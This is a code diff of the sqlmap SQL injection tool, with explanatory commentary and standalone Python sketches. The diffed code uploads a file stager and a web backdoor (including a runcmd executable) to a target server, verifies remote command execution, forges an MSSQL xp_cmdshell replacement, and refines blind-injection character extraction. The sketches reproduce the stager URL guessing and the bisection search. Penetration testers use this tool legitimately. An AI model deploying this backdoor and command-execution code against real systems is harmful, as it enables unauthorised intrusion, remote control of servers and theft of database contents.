+infoMsg = "the file stager has been successfully uploaded "
+infoMsg += "on '%s' - %s" % (directory, self.webStagerUrl)
+logger.info(infoMsg)
+
+if self.webApi == WEB_API.ASP:
+match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
+
+if match:
+backdoorDirectory = match.group(1)
+else:
 continue

-elif self.webApi == WEB_API.ASPX:
-kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage)
-kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage)
+_ = "tmpe%s.exe" % randomStr(lowercase=True)
+if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)):
+self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'))
+self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName)
+self.webDirectory = backdoorDirectory
+else:
+continue

-infoMsg = "the file stager has been successfully uploaded "
-infoMsg += "on '%s' - %s" % (localPath, self.webStagerUrl)
-logger.info(infoMsg)
+else:
+if not self.webUpload(backdoorName, posixToNtSlashes(directory) if Backend.isOs(OS.WINDOWS) else directory, content=backdoorContent):
+warnMsg = "backdoor has not been successfully uploaded "
+warnMsg += "through the file stager possibly because "
+warnMsg += "the user running the web server process "
+warnMsg += "has not write privileges over the folder "
+warnMsg += "where the user running the DBMS process "
+warnMsg += "was able to upload the file stager or "
+warnMsg += "because the DBMS and web server sit on "
+warnMsg += "different servers"
+logger.warn(warnMsg)

-if self.webApi == WEB_API.ASP:
-match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
+message = "do you want to try the same method used "
+message += "for the file stager? [Y/n] "
+getOutput = readInput(message, default="Y")

-if match:
-backdoorDirectory = match.group(1)
+if getOutput in ("y", "Y"):
+self._webFileInject(backdoorContent, backdoorName, directory)
 else:
 continue

-_ = "tmpe%s.exe" % randomStr(lowercase=True)
-if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)):
-self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'))
-self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName)
-self.webDirectory = backdoorDirectory
-else:
-continue
+self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName)
+self.webDirectory = directory

-else:
-if not self.webUpload(backdoorName, posixToNtSlashes(localPath) if Backend.isOs(OS.WINDOWS) else localPath, content=backdoorContent):
-warnMsg = "backdoor has not been successfully uploaded "
-warnMsg += "through the file stager possibly because "
-warnMsg += "the user running the web server process "
-warnMsg += "has not write privileges over the folder "
-warnMsg += "where the user running the DBMS process "
-warnMsg += "was able to upload the file stager or "
-warnMsg += "because the DBMS and web server sit on "
-warnMsg += "different servers"
-logger.warn(warnMsg)
+self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName)

-message = "do you want to try the same method used "
-message += "for the file stager? [Y/n] "
-getOutput = readInput(message, default="Y")
+testStr = "command execution test"
+output = self.webBackdoorRunCmd("echo %s" % testStr)

-if getOutput in ("y", "Y"):
-self._webFileInject(backdoorContent, backdoorName, localPath)
-else:
-continue
+if output == "0":
+warnMsg = "the backdoor has been uploaded but required privileges "
+warnMsg += "for running the system commands are missing"
+raise SqlmapNoneDataException(warnMsg)
+elif output and testStr in output:
+infoMsg = "the backdoor has been successfully "
+else:
+infoMsg = "the backdoor has probably been successfully "

-self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
-self.webDirectory = localPath
+infoMsg += "uploaded on '%s' - " % self.webDirectory
+infoMsg += self.webBackdoorUrl
+logger.info(infoMsg)

-self.webBackdoorFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, backdoorName))).replace("//", "/").rstrip('/')
+success = True

-testStr = "command execution test"
-output = self.webBackdoorRunCmd("echo %s" % testStr)
-
-if output and testStr in output:
-infoMsg = "the backdoor has been successfully "
-else:
-infoMsg = "the backdoor has probably been successfully "
-
-infoMsg += "uploaded on '%s' - " % self.webDirectory
-infoMsg += self.webBackdoorUrl
-logger.info(infoMsg)
-
-success = True
-
-break
+break
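A key change in the hunk above is how the stager URL is guessed: instead of deriving a single URI from a document root, the new code iterates over every '/' in the writable directory and treats each suffix of the path as a possible web-root-relative location. The following standalone sketch (not sqlmap code; the function name and the example host, port and path are illustrative only) reproduces just that URL-guessing loop:

```python
# Sketch: derive candidate URLs for an uploaded file from its filesystem directory.
import re

def candidate_stager_urls(scheme, hostname, port, directory, stager_name):
    urls = []
    for match in re.finditer("/", directory):
        # Take the path suffix starting at this slash as the URL path component
        base = "%s://%s:%d%s/" % (scheme, hostname, port, directory[match.start():].rstrip("/"))
        urls.append(base + stager_name)
    return urls

for url in candidate_stager_urls("http", "192.168.1.10", 80, "/var/www/html/app/", "tmpuabcd.php"):
    print(url)
# Prints five candidates, from the full path down to the bare web root.
```

Each candidate is then probed (in the real code via a direct page request) until one of them serves the uploaded stager, which avoids having to know the document root in advance.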
@@ -1,12 +1,13 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

 from lib.core.agent import agent
 from lib.core.common import Backend
+from lib.core.common import flattenValue
 from lib.core.common import getLimitRange
 from lib.core.common import getSQLSnippet
 from lib.core.common import hashDBWrite
@@ -51,10 +52,9 @@ class Xp_cmdshell:
 inject.goStacked(agent.runAsDBMSUser(cmd))

 self._randStr = randomStr(lowercase=True)
-self._xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
-self.xpCmdshellStr = "master..%s" % self._xpCmdshellNew
+self.xpCmdshellStr = "master..new_xp_cmdshell"

-cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr, XP_CMDSHELL_NEW=self._xpCmdshellNew)
+cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr)

 if Backend.isVersionWithin(("2005", "2008")):
 cmd += ";RECONFIGURE WITH OVERRIDE"
@@ -142,13 +142,13 @@ class Xp_cmdshell:
 charCounter += len(echoedLine)

 if charCounter >= maxLen:
-self.xpCmdshellExecCmd(cmd)
+self.xpCmdshellExecCmd(cmd.rstrip(" & "))

 cmd = ""
 charCounter = 0

 if cmd:
-self.xpCmdshellExecCmd(cmd)
+self.xpCmdshellExecCmd(cmd.rstrip(" & "))

 def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
 # When user provides DBMS credentials (with --dbms-cred) we need to
@@ -226,12 +226,16 @@ class Xp_cmdshell:
 inject.goStacked("DELETE FROM %s" % self.cmdTblName)

 if output and isListLike(output) and len(output) > 1:
-if not (output[0] or "").strip():
-output = output[1:]
-elif not (output[-1] or "").strip():
-output = output[:-1]
+_ = ""
+lines = [line for line in flattenValue(output) if line is not None]

-output = "\n".join(line for line in filter(None, output))
+for i in xrange(len(lines)):
+line = lines[i] or ""
+if line is None or i in (0, len(lines) - 1) and not line.strip():
+continue
+_ += "%s\n" % line
+
+output = _.rstrip('\n')

 return output
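The last hunk replaces the old head/tail trimming with a full flatten-and-join of the command output: nested rows are flattened, `None` entries dropped, blank first and last lines skipped, and the rest joined with newlines. A hedged, standalone sketch of that post-processing (not sqlmap code; `flatten` and `join_output` are illustrative names):

```python
# Sketch: flatten nested output rows and join them, trimming blank edge lines.
def flatten(value):
    for item in value:
        if isinstance(item, (list, tuple)):
            for sub in flatten(item):
                yield sub
        else:
            yield item

def join_output(output):
    lines = [line for line in flatten(output) if line is not None]
    result = ""
    for i, line in enumerate(lines):
        line = line or ""
        if i in (0, len(lines) - 1) and not line.strip():
            continue  # drop blank padding rows at either end
        result += "%s\n" % line
    return result.rstrip("\n")

print(join_output([["", "Volume in drive C"], ["2 Dir(s)"], [""]]))
# Volume in drive C
# 2 Dir(s)
```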
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
@@ -40,6 +40,7 @@ from lib.core.settings import INFERENCE_UNKNOWN_CHAR
 from lib.core.settings import INFERENCE_GREATER_CHAR
 from lib.core.settings import INFERENCE_EQUALS_CHAR
 from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR
+from lib.core.settings import MAX_BISECTION_LENGTH
 from lib.core.settings import MAX_TIME_REVALIDATION_STEPS
 from lib.core.settings import PARTIAL_HEX_VALUE_MARKER
 from lib.core.settings import PARTIAL_VALUE_MARKER
@@ -58,6 +59,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 """

 abortedFlag = False
+showEta = False
 partialValue = u""
 finalValue = None
 retrievedLength = 0
@@ -135,6 +137,9 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 if length and (lastChar > 0 or firstChar > 0):
 length = min(length, lastChar or length) - firstChar

+if length and length > MAX_BISECTION_LENGTH:
+length = None
+
 showEta = conf.eta and isinstance(length, int)
 numThreads = min(conf.threads, length)

@@ -194,7 +199,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 value are not equal there will be a deliberate delay).
 """

-if CHAR_INFERENCE_MARK not in payload:
+if "'%s'" % CHAR_INFERENCE_MARK not in payload:
 forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx, value))
 else:
 # e.g.: ... > '%c' -> ... > ORD(..)
@@ -221,7 +226,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 if charTbl is None:
 charTbl = type(asciiTbl)(asciiTbl)

-originalTbl = type(asciiTbl)(charTbl)
+originalTbl = type(charTbl)(charTbl)

 if continuousOrder and shiftTable is None:
 # Used for gradual expanding into unicode charspace
@@ -250,7 +255,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 position = (len(charTbl) >> 1)
 posValue = charTbl[position]

-if CHAR_INFERENCE_MARK not in payload:
+if "'%s'" % CHAR_INFERENCE_MARK not in payload:
 forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
 else:
 # e.g.: ... > '%c' -> ... > ORD(..)
@@ -309,10 +314,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 errMsg = "invalid character detected. retrying.."
 logger.error(errMsg)

-conf.timeSec += 1
+if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE:
+conf.timeSec += 1
 warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '')
 logger.warn(warnMsg)

 if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES:
 dbgMsg = "turning off time auto-adjustment mechanism"
@@ -340,10 +345,13 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 if minValue == maxChar or maxValue == minChar:
 return None

-# If we are working with non-continuous elements, set
-# both minValue and character afterwards are possible
-# candidates
-for retVal in (originalTbl[originalTbl.index(minValue)], originalTbl[originalTbl.index(minValue) + 1]):
+for index in xrange(len(originalTbl)):
+if originalTbl[index] == minValue:
+break
+
+# If we are working with non-continuous elements, both minValue and character after
+# are possible candidates
+for retVal in (originalTbl[index], originalTbl[index + 1]):
 forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, retVal))
 result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
 incrementCounter(kb.technique)
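These hunks touch the blind-injection bisection routine: a `MAX_BISECTION_LENGTH` sanity cap on the reported length, stricter matching of the `'%c'` inference marker, and an index-based lookup into the original character table for non-continuous charsets. The core idea being tuned is a binary search over an ordered character table, where each comparison costs one blind request. The following simplified, standalone sketch (not sqlmap code; the oracle callback stands in for a boolean-blind SQL request, and details such as time-based retries, Unicode expansion, and non-continuous charsets are omitted) shows that core:

```python
# Sketch: recover one unknown character with "greater than" questions only.
def bisect_char(oracle_greater_than, char_table):
    """oracle_greater_than(value) stands in for one boolean-blind request."""
    table = sorted(char_table)
    lo, hi = 0, len(table) - 1
    while lo < hi:
        mid = (lo + hi) >> 1
        if oracle_greater_than(table[mid]):
            lo = mid + 1  # character is strictly above table[mid]
        else:
            hi = mid      # character is table[mid] or below
    return table[lo]

secret = ord("s")
print(chr(bisect_char(lambda value: secret > value, range(128))))  # 's'
```

With a 128-entry table this needs about seven requests per character, which is why capping the total length (the new `MAX_BISECTION_LENGTH` guard) matters when a bogus length estimate would otherwise trigger an enormous number of requests.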
Some files were not shown because too many files have changed in this diff.